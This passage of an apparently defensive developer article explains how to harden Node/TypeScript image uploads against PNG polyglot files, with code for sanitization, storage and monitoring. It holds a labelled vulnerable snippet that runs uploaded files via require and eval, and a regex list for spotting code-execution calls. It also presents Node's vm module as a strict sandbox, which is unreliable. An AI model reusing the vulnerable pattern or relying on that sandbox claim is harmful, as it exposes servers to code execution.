class="o">=</span> <span class="nx">iendPos</span> <span class="o">+</span> <span class="mi">8</span><span class="p">;</span> <span class="c1">// IEND (4) + CRC (4)</span> <span class="kd">const</span> <span class="nx">dataAfterIEND</span> <span class="o">=</span> <span class="nx">buffer</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="nx">iendEnd</span><span class="p">);</span> <span class="c1">// Reject if there's significant data after IEND</span> <span class="k">if </span><span class="p">(</span><span class="nx">dataAfterIEND</span><span class="p">.</span><span class="nx">length</span> <span class="o">&gt;</span> <span class="mi">10</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="kc">false</span><span class="p">;</span> <span class="c1">// Suspicious - PNG should end at IEND</span> <span class="p">}</span> <span class="p">}</span> <span class="k">return</span> <span class="kc">true</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h4> Strip Trailing Data </h4> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">function</span> <span class="nf">sanitizePNG</span><span class="p">(</span><span class="nx">buffer</span><span class="p">:</span> <span class="nx">Buffer</span><span class="p">):</span> <span class="nx">Buffer</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">iendPos</span> <span class="o">=</span> <span class="nx">buffer</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="nx">Buffer</span><span class="p">.</span><span class="k">from</span><span class="p">(</span><span class="dl">"</span><span class="s2">IEND</span><span class="dl">"</span><span class="p">));</span> <span class="k">if </span><span class="p">(</span><span class="nx">iendPos</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Return only up to IEND + CRC (8 bytes after IEND marker)</span> <span class="k">return</span> <span class="nx">buffer</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">iendPos</span> <span class="o">+</span> <span class="mi">8</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">buffer</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// Use sanitized buffer</span> <span class="kd">const</span> <span class="nx">sanitized</span> <span class="o">=</span> <span class="nf">sanitizePNG</span><span class="p">(</span><span class="nx">imageBuffer</span><span class="p">);</span> <span class="k">await</span> <span class="nf">saveOriginalFile</span><span class="p">(</span><span class="nx">sanitized</span><span class="p">,</span> <span class="nx">filename</span><span class="p">,</span> <span class="nx">serverRoot</span><span class="p">);</span> </code></pre> </div> <h3> 2. File Extension Sanitization </h3> <h4> Never Trust User-Provided Extensions </h4> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="nx">path</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">path</span><span class="dl">"</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">fileTypeFromBuffer</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">file-type</span><span class="dl">"</span><span class="p">;</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">getSafeFilename</span><span class="p">(</span> <span class="nx">originalFilename</span><span class="p">:</span> <span class="kr">string</span><span class="p">,</span> <span class="nx">buffer</span><span class="p">:</span> <span class="nx">Buffer</span> <span class="p">):</span> <span class="nb">Promise</span><span class="o">&lt;</span><span class="kr">string</span><span class="o">&gt;</span> <span class="p">{</span> <span class="c1">// Determine actual file type from content</span> <span class="kd">const</span> <span class="nx">fileType</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fileTypeFromBuffer</span><span class="p">(</span><span class="nx">buffer</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">fileType</span><span class="p">)</span> <span class="p">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">"</span><span class="s2">Unable to determine file type</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Map MIME type to safe extension</span> <span class="kd">const</span> <span class="na">extensionMap</span><span class="p">:</span> <span class="nb">Record</span><span class="o">&lt;</span><span class="kr">string</span><span class="p">,</span> <span class="kr">string</span><span class="o">&gt;</span> <span class="o">=</span> <span class="p">{</span> <span class="dl">"</span><span class="s2">image/png</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">.png</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">image/jpeg</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">.jpg</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">image/webp</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">.webp</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">image/gif</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">.gif</span><span class="dl">"</span><span class="p">,</span> <span class="p">};</span> <span class="kd">const</span> <span class="nx">safeExt</span> <span class="o">=</span> <span class="nx">extensionMap</span><span class="p">[</span><span class="nx">fileType</span><span class="p">.</span><span class="nx">mime</span><span class="p">]</span> <span class="o">||</span> <span class="dl">"</span><span class="s2">.bin</span><span class="dl">"</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">baseName</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">basename</span><span class="p">(</span> <span class="nx">originalFilename</span><span class="p">,</span> <span class="nx">path</span><span class="p">.</span><span class="nf">extname</span><span class="p">(</span><span class="nx">originalFilename</span><span class="p">)</span> <span class="p">);</span> <span class="kd">const</span> <span class="nx">timestamp</span> <span class="o">=</span> <span class="nb">Date</span><span class="p">.</span><span class="nf">now</span><span class="p">();</span> <span class="c1">// Always use safe extension, ignore user-provided extension</span> <span class="k">return</span> <span class="s2">`</span><span class="p">${</span><span class="nx">baseName</span><span class="p">}</span><span class="s2">_</span><span class="p">${</span><span class="nx">timestamp</span><span class="p">}${</span><span class="nx">safeExt</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h3> 3. Secure File Processing </h3> <h4> Never Execute Uploaded Files </h4> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// ❌ VULNERABLE - Never do this</span> <span class="nf">require</span><span class="p">(</span><span class="nx">uploadedFilePath</span><span class="p">);</span> <span class="nx">vm</span><span class="p">.</span><span class="nf">runInThisContext</span><span class="p">(</span><span class="nx">fileContent</span><span class="p">);</span> <span class="nf">eval</span><span class="p">(</span><span class="nx">fileContent</span><span class="p">);</span> <span class="c1">// ✅ SECURE - Use whitelist approach</span> <span class="kd">const</span> <span class="nx">ALLOWED_PLUGINS</span> <span class="o">=</span> <span class="p">[</span><span class="dl">"</span><span class="s2">plugin1.js</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">plugin2.js</span><span class="dl">"</span><span class="p">];</span> <span class="k">if </span><span class="p">(</span><span class="nx">ALLOWED_PLUGINS</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="nx">filename</span><span class="p">))</span> <span class="p">{</span> <span class="nf">require</span><span class="p">(</span><span class="nx">pluginPath</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">"</span><span class="s2">Plugin not in whitelist</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h4> Use Sandboxed Execution (If Necessary) </h4> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="nx">vm</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">vm</span><span class="dl">"</span><span class="p">;</span> <span class="c1">// If you MUST execute user code, use strict sandboxing</span> <span class="kd">function</span> <span class="nf">executeInSandbox</span><span class="p">(</span><span class="nx">code</span><span class="p">:</span> <span class="kr">string</span><span class="p">):</span> <span class="kr">any</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">sandbox</span> <span class="o">=</span> <span class="p">{</span> <span class="na">console</span><span class="p">:</span> <span class="p">{</span> <span class="na">log</span><span class="p">:</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{}</span> <span class="p">},</span> <span class="c1">// Limited console</span> <span class="c1">// No require, no fs, no process, no global</span> <span class="p">};</span> <span class="kd">const</span> <span class="nx">context</span> <span class="o">=</span> <span class="nx">vm</span><span class="p">.</span><span class="nf">createContext</span><span class="p">(</span><span class="nx">sandbox</span><span class="p">);</span> <span class="k">return</span> <span class="nx">vm</span><span class="p">.</span><span class="nf">runInContext</span><span class="p">(</span><span class="nx">code</span><span class="p">,</span> <span class="nx">context</span><span class="p">,</span> <span class="p">{</span> <span class="na">timeout</span><span class="p">:</span> <span class="mi">1000</span><span class="p">,</span> <span class="c1">// Timeout</span> <span class="na">displayErrors</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span> <span class="p">});</span> <span class="p">}</span> </code></pre> </div> <h3> 4. File Storage Security </h3> <h4> Store Files Outside Web Root </h4> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// ❌ VULNERABLE</span> <span class="kd">const</span> <span class="nx">uploadsDir</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">serverRoot</span><span class="p">,</span> <span class="dl">"</span><span class="s2">public</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">uploads</span><span class="dl">"</span><span class="p">);</span> <span class="c1">// Files accessible via HTTP: /uploads/file.png</span> <span class="c1">// ✅ SECURE</span> <span class="kd">const</span> <span class="nx">uploadsDir</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">serverRoot</span><span class="p">,</span> <span class="dl">"</span><span class="s2">storage</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">uploads</span><span class="dl">"</span><span class="p">);</span> <span class="c1">// Files NOT directly accessible via HTTP</span> </code></pre> </div> <h4> Use Content-Addressed Storage </h4> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="nx">crypto</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">crypto</span><span class="dl">"</span><span class="p">;</span> <span class="kd">function</span> <span class="nf">getContentHash</span><span class="p">(</span><span class="nx">buffer</span><span class="p">:</span> <span class="nx">Buffer</span><span class="p">):</span> <span class="kr">string</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">crypto</span><span class="p">.</span><span class="nf">createHash</span><span class="p">(</span><span class="dl">"</span><span class="s2">sha256</span><span class="dl">"</span><span class="p">).</span><span class="nf">update</span><span class="p">(</span><span class="nx">buffer</span><span class="p">).</span><span class="nf">digest</span><span class="p">(</span><span class="dl">"</span><span class="s2">hex</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Store files by content hash, not original filename</span> <span class="kd">const</span> <span class="nx">contentHash</span> <span class="o">=</span> <span class="nf">getContentHash</span><span class="p">(</span><span class="nx">imageBuffer</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">safePath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">uploadsDir</span><span class="p">,</span> <span class="s2">`</span><span class="p">${</span><span class="nx">contentHash</span><span class="p">}</span><span class="s2">.png`</span><span class="p">);</span> </code></pre> </div> <h3> 5. Input Validation </h3> <h4> Validate at Multiple Layers </h4> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Layer 1: Request validation</span> <span class="kd">function</span> <span class="nf">validateUploadRequest</span><span class="p">(</span><span class="nx">file</span><span class="p">:</span> <span class="nx">File</span><span class="p">):</span> <span class="k">void</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">file</span><span class="p">)</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">"</span><span class="s2">No file provided</span><span class="dl">"</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">file</span><span class="p">.</span><span class="nx">size</span> <span class="o">&gt;</span> <span class="mi">10</span> <span class="o">*</span> <span class="mi">1024</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">)</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">"</span><span class="s2">File too large</span><span class="dl">"</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">file</span><span class="p">.</span><span class="kd">type</span><span class="p">.</span><span class="nf">startsWith</span><span class="p">(</span><span class="dl">"</span><span class="s2">image/</span><span class="dl">"</span><span class="p">))</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">"</span><span class="s2">Not an image</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Layer 2: Content validation</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">validateFileContent</span><span class="p">(</span><span class="nx">buffer</span><span class="p">:</span> <span class="nx">Buffer</span><span class="p">):</span> <span class="nb">Promise</span><span class="o">&lt;</span><span class="k">void</span><span class="o">&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">fileType</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fileTypeFromBuffer</span><span class="p">(</span><span class="nx">buffer</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">fileType</span> <span class="o">||</span> <span class="o">!</span><span class="nx">fileType</span><span class="p">.</span><span class="nx">mime</span><span class="p">.</span><span class="nf">startsWith</span><span class="p">(</span><span class="dl">"</span><span class="s2">image/</span><span class="dl">"</span><span class="p">))</span> <span class="p">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">"</span><span class="s2">Invalid image file</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Additional validation...</span> <span class="p">}</span> <span class="c1">// Layer 3: Sanitization</span> <span class="kd">function</span> <span class="nf">sanitizeFile</span><span class="p">(</span><span class="nx">buffer</span><span class="p">:</span> <span class="nx">Buffer</span><span class="p">):</span> <span class="nx">Buffer</span> <span class="p">{</span> <span class="c1">// Remove any trailing data, normalize format</span> <span class="k">return</span> <span class="nf">sanitizePNG</span><span class="p">(</span><span class="nx">buffer</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> 6. Least Privilege </h3> <h4> Run File Processors with Limited Permissions </h4> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Use separate process with limited permissions</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">spawn</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">child_process</span><span class="dl">"</span><span class="p">;</span> <span class="kd">function</span> <span class="nf">processFileSecurely</span><span class="p">(</span><span class="nx">filePath</span><span class="p">:</span> <span class="kr">string</span><span class="p">):</span> <span class="k">void</span> <span class="p">{</span> <span class="c1">// Run in isolated process with no network/filesystem access</span> <span class="kd">const</span> <span class="nx">child</span> <span class="o">=</span> <span class="nf">spawn</span><span class="p">(</span><span class="dl">"</span><span class="s2">node</span><span class="dl">"</span><span class="p">,</span> <span class="p">[</span><span class="dl">"</span><span class="s2">--no-warnings</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">processor.js</span><span class="dl">"</span><span class="p">,</span> <span class="nx">filePath</span><span class="p">],</span> <span class="p">{</span> <span class="na">stdio</span><span class="p">:</span> <span class="dl">"</span><span class="s2">pipe</span><span class="dl">"</span><span class="p">,</span> <span class="na">env</span><span class="p">:</span> <span class="p">{},</span> <span class="c1">// No environment variables</span> <span class="p">});</span> <span class="c1">// Monitor and timeout</span> <span class="kd">const</span> <span class="nx">timeout</span> <span class="o">=</span> <span class="nf">setTimeout</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="nx">child</span><span class="p">.</span><span class="nf">kill</span><span class="p">(),</span> <span class="mi">5000</span><span class="p">);</span> <span class="nx">child</span><span class="p">.</span><span class="nf">on</span><span class="p">(</span><span class="dl">"</span><span class="s2">exit</span><span class="dl">"</span><span class="p">,</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="nf">clearTimeout</span><span class="p">(</span><span class="nx">timeout</span><span class="p">));</span> <span class="p">}</span> </code></pre> </div> <h2> Detection and Monitoring </h2> <h3> 1. File Content Monitoring </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="kd">function</span> <span class="nf">detectSuspiciousContent</span><span class="p">(</span><span class="nx">buffer</span><span class="p">:</span> <span class="nx">Buffer</span><span class="p">):</span> <span class="nx">boolean</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">content</span> <span class="o">=</span> <span class="nx">buffer</span><span class="p">.</span><span class="nf">toString</span><span class="p">(</span><span class="dl">"</span><span class="s2">utf-8</span><span class="dl">"</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">Math</span><span class="p">.</span><span class="nf">min</span><span class="p">(</span><span class="mi">1000</span><span class="p">,</span> <span class="nx">buffer</span><span class="p">.</span><span class="nx">length</span><span class="p">));</span> <span class="kd">const</span> <span class="nx">suspiciousPatterns</span> <span class="o">=</span> <span class="p">[</span> <span class="sr">/require</span><span class="se">\s</span><span class="sr">*</span><span class="se">\(</span><span class="sr">/</span><span class="p">,</span> <span class="sr">/eval</span><span class="se">\s</span><span class="sr">*</span><span class="se">\(</span><span class="sr">/</span><span class="p">,</span> <span class="sr">/Function</span><span class="se">\s</span><span class="sr">*</span><span class="se">\(</span><span class="sr">/</span><span class="p">,</span> <span class="sr">/child_process/</span><span class="p">,</span> <span class="sr">/fs</span><span class="se">\.</span><span class="sr">writeFile/</span><span class="p">,</span> <span class="sr">/process</span><span class="se">\.</span><span class="sr">exit/</span><span class="p">,</span> <span class="p">];</span> <span class="k">return</span> <span class="nx">suspiciousPatterns</span><span class="p">.</span><span class="nf">some</span><span class="p">((</span><span class="nx">pattern</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nx">pattern</span><span class="p">.</span><span class="nf">test</span><span class="p">(</span><span class="nx">content</span><span class="p">));</span> <span class="p">}</span> </code></pre> </div> <h3> 2. Execution Monitoring </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// Monitor file execution attempts</span> <span class="kd">function</span> <span class="nf">logFileExecution</span><span class="p">(</span><span class="nx">filePath</span><span class="p">:</span> <span class="kr">string</span><span class="p">,</span> <span class="nx">success</span><span class="p">:</span> <span class="nx">boolean</span><span class="p">):</span> <span class="k">void</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">logEntry</span> <span class="o">=</span> <span class="p">{</span> <span class="na">timestamp</span><span class="p">:</span> <span class="k">new</span> <span class="nc">Date</span><span class="p">().</span><span class="nf">toISOString</span><span class="p">(),</span> <span class="nx">filePath</span><span class="p">,</span> <span class="nx">success</span><span class="p">,</span> <span class="na">suspicious</span><span class="p">:</span> <span class="nf">detectSuspiciousContent</span><span class="p">(</span><span class="nx">fs</span><span class="p">.</span><span class="nf">readFileSync</span><span class="p">(</span><span class="nx">filePath</span><span class="p">)),</span> <span class="p">};</span> <span class="c1">// Send to security monitoring system</span> <span class="nx">securityLogger</span><span class="p">.</span><span class="nf">warn</span><span class="p">(</span><span class="dl">"</span><span class="s2">File execution attempt</span><span class="dl">"</span><span class="p">,</span> <span class="nx">logEntry</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> 3. Anomaly Detection </h3> <ul> <li>Monitor for files with unusual sizes (too large for images)</li> <li>Track files with data after IEND chunks</li> <li>Alert on execution of files from uploads directory</li> <li>Monitor for suspicious file operations after uploads</li> </ul> <h2> Incident Response </h2> <h3> If Attack is Detected </h3> <ol> <li><strong>Immediate Actions</strong></li> </ol> <ul> <li>Disable file upload functionality</li> <li>Isolate affected server/container</li> <li>Review recent uploads for polyglot files</li> <li>Check for execution artifacts</li> </ul> <ol> <li><strong>Investigation</strong></li> </ol> <ul> <li>Review file watcher/processor logs</li> <li>Check for suspicious file operations</li> <li>Identify which files were executed</li> <li>Determine scope of compromise</li> </ul> <ol> <li><strong>Containment</strong></li> </ol> <ul> <li>Remove malicious files</li> <li>Revoke compromised credentials</li> <li>Patch vulnerable code</li> <li>Implement additional security measures</li> </ul> <ol> <li> <strong>Recovery</strong> <ul> <li>Restore from clean backups</li> <li>Rebuild affected systems</li> <li>Implement prevention measures</li> <li>Monitor for re-infection</li> </ul> </li> </ol> <h2> Code Examples </h2> <h3> Secure Image Upload Handler </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">fileTypeFromBuffer</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">file-type</span><span class="dl">"</span><span class="p">;</span> <span class="k">import</span> <span class="nx">sharp</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">sharp</span><span class="dl">"</span><span class="p">;</span> <span class="k">import</span> <span class="nx">crypto</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">crypto</span><span class="dl">"</span><span class="p">;</span> <span class="k">import</span> <span class="nx">path</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">path</span><span class="dl">"</span><span class="p">;</span> <span class="k">import</span> <span class="nx">fs</span> <span class="k">from</span> <span class="dl">"</span><span class="s2">fs</span><span class="dl">"</span><span class="p">;</span> <span class="k">export</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">secureImageUpload</span><span class="p">(</span> <span class="nx">fileBuffer</span><span class="p">:</span> <span class="nx">Buffer</span><span class="p">,</span> <span class="nx">originalFilename</span><span class="p">:</span> <span class="kr">string</span> <span class="p">):</span> <span class="nb">Promise</span><span class="o">&lt;</span><span class="p">{</span> <span class="na">success</span><span class="p">:</span> <span class="nx">boolean</span><span class="p">;</span> <span class="nl">filePath</span><span class="p">?:</span> <span class="kr">string</span><span class="p">;</span> <span class="nl">error</span><span class="p">?:</span> <span class="kr">string</span> <span class="p">}</span><span class="o">&gt;</span> <span class="p">{</span> <span class="k">try</span> <span class="p">{</span> <span class="c1">// 1. Validate file type from content</span> <span class="kd">const</span> <span class="nx">fileType</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fileTypeFromBuffer</span><span class="p">(</span><span class="nx">fileBuffer</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">fileType</span> <span class="o">||</span> <span class="o">!</span><span class="nx">fileType</span><span class="p">.</span><span class="nx">mime</span><span class="p">.</span><span class="nf">startsWith</span><span class="p">(</span><span class="dl">"</span><span class="s2">image/</span><span class="dl">"</span><span class="p">))</span> <span class="p">{</span> <span class="k">return</span> <span class="p">{</span> <span class="na">success</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span> <span class="na">error</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Invalid image file</span><span class="dl">"</span> <span class="p">};</span> <span class="p">}</span> <span class="c1">// 2. Validate PNG structure</span> <span class="k">if </span><span class="p">(</span><span class="nx">fileType</span><span class="p">.</span><span class="nx">mime</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">image/png</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">pngHeader</span> <span class="o">=</span> <span class="nx">Buffer</span><span class="p">.</span><span class="k">from</span><span class="p">([</span> <span class="mh">0x89</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">,</span> <span class="mh">0x4e</span><span class="p">,</span> <span class="mh">0x47</span><span class="p">,</span> <span class="mh">0x0d</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="mh">0x1a</span><span class="p">,</span> <span class="mh">0x0a</span><span class="p">,</span> <span class="p">]);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">fileBuffer</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">8</span><span class="p">).</span><span class="nf">equals</span><span class="p">(</span><span class="nx">pngHeader</span><span class="p">))</span> <span class="p">{</span> <span class="k">return</span> <span class="p">{</span> <span class="na">success</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span> <span class="na">error</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Invalid PNG structure</span><span class="dl">"</span> <span class="p">};</span> <span class="p">}</span> <span class="c1">// 3. Check for data after IEND</span> <span class="kd">const</span> <span class="nx">iendPos</span> <span class="o">=</span> <span class="nx">fileBuffer</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="nx">Buffer</span><span class="p">.</span><span class="k">from</span><span class="p">(</span><span class="dl">"</span><span class="s2">IEND</span><span class="dl">"</span><span class="p">));</span> <span class="k">if </span><span class="p">(</span><span class="nx">iendPos</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">dataAfterIEND</span> <span class="o">=</span> <span class="nx">fileBuffer</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="nx">iendPos</span> <span class="o">+</span> <span class="mi">8</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">dataAfterIEND</span><span class="p">.</span><span class="nx">length</span> <span class="o">&gt;</span> <span class="mi">10</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="p">{</span> <span class="na">success</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span> <span class="na">error</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Suspicious data after PNG end</span><span class="dl">"</span> <span class="p">};</span> <span class="p">}</span> <span class="p">}</span> <span class="c1">// 4. Sanitize - remove any trailing data</span> <span class="kd">const</span> <span class="nx">sanitized</span> <span class="o">=</span> <span class="nf">sanitizePNG</span><span class="p">(</span><span class="nx">fileBuffer</span><span class="p">);</span> <span class="nx">fileBuffer</span> <span class="o">=</span> <span class="nx">sanitized</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// 5. Reprocess image to ensure it's clean</span> <span class="kd">const</span> <span class="nx">processed</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">sharp</span><span class="p">(</span><span class="nx">fileBuffer</span><span class="p">).</span><span class="nf">png</span><span class="p">().</span><span class="nf">toBuffer</span><span class="p">();</span> <span class="c1">// 6. Generate safe filename (content hash)</span> <span class="kd">const</span> <span class="nx">contentHash</span> <span class="o">=</span> <span class="nx">crypto</span> <span class="p">.</span><span class="nf">createHash</span><span class="p">(</span><span class="dl">"</span><span class="s2">sha256</span><span class="dl">"</span><span class="p">)</span> <span class="p">.</span><span class="nf">update</span><span class="p">(</span><span class="nx">processed</span><span class="p">)</span> <span class="p">.</span><span class="nf">digest</span><span class="p">(</span><span class="dl">"</span><span class="s2">hex</span><span class="dl">"</span><span class="p">)</span> <span class="p">.</span><span class="nf">substring</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">safeExt</span> <span class="o">=</span> <span class="nx">fileType</span><span class="p">.</span><span class="nx">ext</span> <span class="o">||</span> <span class="dl">"</span><span class="s2">png</span><span class="dl">"</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">safeFilename</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">contentHash</span><span class="p">}</span><span class="s2">.</span><span class="p">${</span><span class="nx">safeExt</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="c1">// 7. Store in secure location (outside web root)</span> <span class="kd">const</span> <span class="nx">storageDir</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nf">cwd</span><span class="p">(),</span> <span class="dl">"</span><span class="s2">storage</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">uploads</span><span class="dl">"</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">fs</span><span class="p">.</span><span class="nf">existsSync</span><span class="p">(</span><span class="nx">storageDir</span><span class="p">))</span> <span class="p">{</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">mkdirSync</span><span class="p">(</span><span class="nx">storageDir</span><span class="p">,</span> <span class="p">{</span> <span class="na">recursive</span><span class="p">:</span> <span class="kc">true</span> <span class="p">});</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">filePath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">storageDir</span><span class="p">,</span> <span class="nx">safeFilename</span><span class="p">);</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">writeFileSync</span><span class="p">(</span><span class="nx">filePath</span><span class="p">,</span> <span class="nx">processed</span><span class="p">);</span> <span class="k">return</span> <span class="p">{</span> <span class="na">success</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="nx">filePath</span> <span class="p">};</span> <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="p">{</span> <span class="na">success</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span> <span class="na">error</span><span class="p">:</span> <span class="nx">error</span> <span class="k">instanceof</span> <span class="nb">Error</span> <span class="p">?</span> <span class="nx">error</span><span class="p">.</span><span class="nx">message</span> <span class="p">:</span> <span class="dl">"</span><span class="s2">Upload failed</span><span class="dl">"</span><span class="p">,</span> <span class="p">};</span> <span class="p">}</span> <span class="p">}</span> <span class="kd">function</span> <span class="nf">sanitizePNG</span><span class="p">(</span><span class="nx">buffer</span><span class="p">:</span> <span class="nx">Buffer</span><span class="p">):</span> <span class="nx">Buffer</span> <span class="p">{</span> <span 